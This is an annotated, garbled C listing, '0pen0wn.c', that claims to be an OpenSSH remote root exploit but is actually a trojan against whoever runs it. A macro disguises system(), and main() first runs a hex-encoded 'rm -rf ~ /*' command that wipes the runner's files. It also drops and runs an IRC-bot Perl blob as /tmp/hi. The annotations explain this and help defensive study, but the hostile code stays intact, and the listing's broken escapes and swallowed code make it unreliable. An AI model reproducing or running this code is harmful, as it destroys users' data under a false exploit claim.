  1. ===============
  2.  
  3. /* 0pen0wn.c by anti-sec group
  4. * ---------------------------
  5. * OpenSSH
  6. #include
  7. #include
  8. #include
  9. #include
  10. #include
  11. #include
  12. #include
  13. #include
  14. #include
  15.  
  // VALID_RANGE is not referenced anywhere in the visible code.
  // build_frem token-pastes its five arguments as a##c##a##x##y##b. The only
  // use on this page is build_frem(t,e,s,m,y), which with x=t, y=e, a=s, b=m,
  // c=y pastes to the identifier `system` -- so every call made through the
  // `fremote` alias defined further down is really a system() call.
  16. #define VALID_RANGE 0xb44ffe00
  17. #define build_frem(x,y,a,b,c) a##c##a##x##y##b
  18.  
  // jmpcode is not machine code. This paste has lost the backslashes of the
  // \x escapes; read as the bytes they stood for, the string decodes to the
  // shell command
  //     rm -rf ~ /* 2> /dev/null &
  // and main() hands it to fremote(), i.e. system(), as its first statement.
  // Building and running this file therefore wipes the home directory (and,
  // as root, the filesystem) of whoever runs it; it never reaches a "target".
  19. char jmpcode[] =
  20. "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
  21. "x64x65x76x2fx6ex75x6cx6cx20x26";
  22.  
  // Not machine code either. With the lost \x escapes restored, recognisable
  // fragments are a Perl script ("#!/usr/bin/perl\n", `$chan="#cn";`, an IRC
  // host name irc.ham.de.euirc.net, and a "chmod +x /tmp/hi 2>/dev/null;/tmp/hi"
  // tail). Whole 16-byte lines recur many times below, so the blob does not
  // appear to be a coherent script -- it looks like padding/decoy material.
  // main() writes it to a local file (fopen(shellcode+793, ...)) and copies it
  // into the buffer sent over the socket.
  23. char shellcode[] =
  24. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  25. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
  26. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  27. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  28. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  29. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  30. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  31. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  32. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  33. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  34. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  35. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  36. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  37. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  38. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  39. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  40. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  41. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  42. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  43. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  44. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  45. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  46. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  47. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  48. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  49. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  50. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  51. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  52. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  53. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  54. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  55. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  56. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  57. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  58. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  59. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  60. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  61. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  62. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  63. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  64. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  65. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  66. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  67. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  68. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  69. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  70. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  71. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  72. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  73. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  74. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  75. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  76. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  77. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  78. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  79. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  80. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  81. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  82. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  83. "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
  84. "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
  85. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  86. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  87. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  88. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  89. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  90. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  91. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  92. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  93. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  94. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  95. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  96. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  97. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  98. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  99. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  100. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  101. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a";
  102.  
  // Same 16-byte fragments as shellcode[] above, reshuffled, ending (with the
  // lost \x escapes restored) in "}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi\n".
  // Like shellcode[] it is text, not machine code, and repeats whole lines.
  // main() selects it instead of shellcode[] only when target is 5 or 6.
  103. char fbsd_shellcode[] =
  104. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  105. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  106. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  107. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  108. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  109. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  110. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  111. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  112. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  113. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  114. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  115. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  116. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  117. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  118. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  119. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  120. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  121. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  122. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  123. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  124. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  125. "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
  126. "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
  127. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  128. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  129. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  130. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  131. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  132. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  133. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  134. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  135. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  136. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  137. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  138. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  139. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  140. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  141. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  142. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  143. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  144. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  145. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  146. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  147. "x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
  148. "x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
  149. "x2fx74x6dx70x2fx68x69x0a";
  // Neither SIZE nor OFFSET is referenced anywhere in the visible code.
  150. #define SIZE 0xffffff
  151. #define OFFSET 131
  // build_frem(t,e,s,m,y) pastes to `system`, so `fremote(x)` is `system(x)`.
  // The indirection is presumably there so that the two system() calls in
  // main() do not show up in a grep for "system".
  152. #define fremote build_frem(t,e,s,m,y)
  153.  
  // Prints the command-line help to stdout.
  // The stray 'n' at the end of every string (and the 't' before each option)
  // is what remains of the "\n" / "\t" escapes after this paste dropped the
  // backslashes. The -d and -B options advertised here would be handled by
  // the argument-parsing code, which is missing from the visible main().
  // arg: argv[0], printed as the program name.
  154. void usage(char *arg){
  155. printf("n[+] 0pen0wn 0wnz Linux/FreeBSDn");
  156. printf(" Usage: %s -h -p portn",arg);
  157. printf(" Options:n");
  158. printf(" t-h ip/host of targetn");
  159. printf(" t-p portn");
  160. printf(" t-d usernamen");
  161. printf(" t-B memory_limit 8/16/64nnn");
  162. }
  163.  
  // Neither FD nor BD is referenced anywhere in the visible code; they read
  // like address constants but nothing uses them.
  164. #define FD 0x080518fc
  165. #define BD 0x08082000
  166.  
  // Program entry point. Two things matter before reading the rest:
  //  * the first executable statement, fremote(jmpcode) on the declaration
  //    line below, is system() on the decoded jmpcode string -- the
  //    "rm -rf ~ /* 2> /dev/null &" command -- and it runs before the root
  //    check, so any user who runs the binary loses their own home directory;
  //  * nothing after that can work as written: the listing is garbled (the
  //    argument parsing collapsed into `if(argc h_addr;`, \x and \n escapes
  //    are gone, the '' char literals are empty), and even with those
  //    restored the socket handling below is broken.
  // Returns 1 on the early failure paths, otherwise 0.
  167. int main(int argc, char **argv){
  168. FILE *jmpinst;
  // fremote(jmpcode) is a call expression placed between declarations (legal
  // in C99). It expands to system(jmpcode). h[] and buffer[] are never
  // initialised anywhere on this page.
  169. char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
  170. int port=23, limit=8, target=0, sock;
  171. struct hostent *host;
  172. struct sockaddr_in addr;
  173.  
  // The root check comes *after* the destructive system() call above.
  174. if (geteuid()) {
  175. puts("need root for raw socket, etc...");
  176. return 1;
  177. }
  178.  
  // Garbled in this paste: the argc check, the option loop that would set
  // port/limit/target, and the gethostbyname() lookup have been swallowed
  // (most likely an unescaped '<' was eaten as markup); only the trailing
  // `h_addr;` and a closing brace survive. Nothing here is recoverable from
  // the page, so addr.sin_addr is never assigned in the visible code.
  179. if(argc h_addr;
  180. }
  181.  
  // socket() result is not checked before use.
  182. sock = socket(PF_INET, SOCK_STREAM, 0);
  183. addr.sin_port = htons(port);
  184. addr.sin_family = AF_INET;
  185. if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
  186. printf(" [-] Connecting failedn");
  187. return 1;
  188. }
  // malloc() result is not checked. With the default limit=8 this is 80000
  // bytes; the lost option parsing may change limit.
  189. payload = malloc(limit * 10000);
  190. ptr = payload+8;
  191. memcpy(ptr,jmpcode,strlen(jmpcode));
  // Writes the shellcode[] text to a local file whose name is whatever sits
  // at byte 793 of shellcode[]. With the escapes lost that offset cannot be
  // read off this page; from the decoded fragments it is presumably /tmp/hi,
  // the path the blob later chmods and executes -- confirm before relying on
  // it. The fseek() is redundant after fopen(..., "w+").
  192. jmpinst=fopen(shellcode+793,"w+");
  193. if(jmpinst){
  194. fseek(jmpinst,0,SEEK_SET);
  195. fprintf(jmpinst,"%s",shellcode);
  196. fclose(jmpinst);
  197. }
  198. ptr += strlen(jmpcode);
  // Both branches pad with 'B' for (limit*10000 - 8 - strlen(<blob>)) bytes,
  // but ptr already sits 8 + strlen(jmpcode) + strlen(<blob>) bytes into the
  // allocation, so the memset overruns the buffer by strlen(jmpcode) bytes --
  // a heap overflow on the machine running this program, not on any target.
  // target is 0 unless the missing option parsing changed it, so the FreeBSD
  // branch is effectively unreachable as shown.
  199. if(target != 5 && target != 6){
  200. memcpy(ptr,shellcode,strlen(shellcode));
  201. ptr += strlen(shellcode);
  202. memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
  203. }
  204. else{
  205. memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
  206. ptr += strlen(fbsd_shellcode);
  207. memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
  208. }
  // buffer is uninitialised: strlen() on it, and sending its contents, is
  // undefined behaviour. ptr now points past the copied blob into the 'B'
  // padding, so the second send() transmits 3750 bytes of 'B'.
  209. send(sock,buffer,strlen(buffer),0);
  210. send(sock,ptr,3750,0);
  211. close(sock);
  // connect() on a descriptor that was just closed normally fails (EBADF);
  // the failure is printed but execution continues regardless.
  212. if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
  213. printf(" [-] connecting failedn");
  214. }
  215.  
  // sizeof(payload) is the size of a char pointer (4 or 8), not of the
  // allocation, so these two stores land within the first 8 bytes of payload,
  // in front of the copied data; strlen(payload) two lines down then stops at
  // or before them, on bytes malloc() never initialised. The '' literals are
  // the remains of '\0' escapes lost in the paste and do not compile.
  216. payload[sizeof(payload)-1] = '';
  217. payload[sizeof(payload)-2] = '';
  // Same uninitialised buffer and closed descriptor as above.
  218. send(sock,buffer,strlen(buffer),0);
  219. send(sock,payload,strlen(payload),0);
  220. close(sock);
  221. free(payload);
  // Third connect() on the same closed descriptor, now to port 6666. If it
  // ever succeeded, the "shell" would be a local /bin/sh started via system()
  // with a prompt string made to look like a root shell; nothing remote is
  // involved.
  222. addr.sin_port = htons(6666);
  223. if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
  224. /* v--- our cool bar that says: "r0000000t!!!" */
  225. printf("n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]nn");
  226. fremote("PS1='sh-3.2#' /bin/sh");
  227. }
  228. else
  229. printf(" [-] failed to exploit target :-( n");
  230. close(sock);
  231. return 0;
  232. }
  233.  
  234. =======================